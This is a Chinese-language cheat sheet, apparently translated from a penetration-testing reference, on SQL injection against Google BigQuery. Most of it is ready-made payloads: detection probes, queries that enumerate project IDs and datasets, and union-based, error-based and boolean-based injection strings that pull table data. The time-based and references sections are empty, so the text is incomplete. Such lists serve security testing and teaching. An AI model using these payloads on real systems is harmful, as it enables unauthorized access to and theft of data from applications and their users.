Google BigQuery SQL 注入 (Google BigQuery SQL Injection)
Google BigQuery SQL 注入是一种安全漏洞,攻击者通过操纵被包含在 SQL 查询中且未经过滤的用户输入,从而在 Google BigQuery 数据库上执行任意 SQL 查询。这可能导致未经授权的数据访问、数据操纵或其他恶意活动。
摘要 (Summary)
探测 (Detection)
- 使用经典的单引号触发错误:
'
- 使用反引号表示法识别 BigQuery:
SELECT .... FROM `` AS ...
| SQL 查询 |
描述 (Description) |
SELECT @@project_id |
获取项目 ID |
SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA |
获取所有数据集名称 |
select * from project_id.dataset_name.table_name |
从特定的项目 ID 和数据集中获取数据 |
| 注释类型 |
描述 (Description) |
# |
井号注释 |
/* PostgreSQL Comment */ |
C 风格注释 |
基于 UNION 的注入 (BigQuery Union Based)
UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT 'asd'),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
' GROUP BY column_name UNION ALL SELECT column_name,1,1 FROM (select column_name AS new_name from `project_id.dataset_name.table_name`) AS A GROUP BY column_name#
基于报错的注入 (BigQuery Error Based)
| SQL 查询 |
描述 (Description) |
' OR if(1/(length((select('a')))-1)=1,true,false) OR ' |
除零错误 (Division by zero) |
select CAST(@@project_id AS INT64) |
类型转换 (Casting) |
基于布尔的注入 (BigQuery Boolean Based)
' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#
基于时间的注入 (BigQuery Time Based)
参考资料 (References)